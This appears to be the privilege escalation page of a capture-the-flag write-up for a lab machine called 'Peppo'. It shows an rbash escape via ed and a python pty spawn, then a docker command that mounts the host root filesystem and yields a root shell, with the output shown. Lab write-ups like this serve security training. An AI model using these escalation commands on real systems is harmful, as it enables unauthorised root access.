🐧
Peppo
  • Peppo
    • Summary
  • Enumeration
    • TCP
    • UDP
    • 8080 - Web Services
      • Nikto
      • Dirb Extensions
      • Dirsearch
      • goBuster
      • Robots
    • 1000 - Web Services
      • Nikto
      • Dirb Extensions
      • Dirsearch
      • goBuster
      • Robots
    • Other Services
      • SSH
      • Ident - 113
      • PostSQL DB
  • Exploitation
  • Priv Escalation
Powered by GitBook
On this page
  • Breaking out of RSHELL
  • Enumerate images

Priv Escalation

PreviousExploitation

Last updated 2 years ago

Breaking out of RSHELL

I first tried to use the following articles.

This one didn't work.

This one also didn't work however after seeing my $PATH, I was able to see the commands I was able to run.

After seeing the commands the current shell was able to run I went to gtfobins.

The ed binary allows us to escape a restricted shell.

We then run the following command to export a new $PATH.

PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
python -c 'import pty; pty.spawn("/bin/bash")'
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin

Enumerate images

Based on the images run the following command:

docker run -v /:/mnt --rm -it redmine chroot /mnt sh
eleanor@peppo:/tmp$ docker run -v /:/mnt --rm -it redmine chroot /mnt sh
# whoami
root

Logoed | GTFOBins
LogoBreakout restricted shell environment rbash | MetaHackers.proMetaHackers
rbash shell esacping
Logodocker | GTFOBins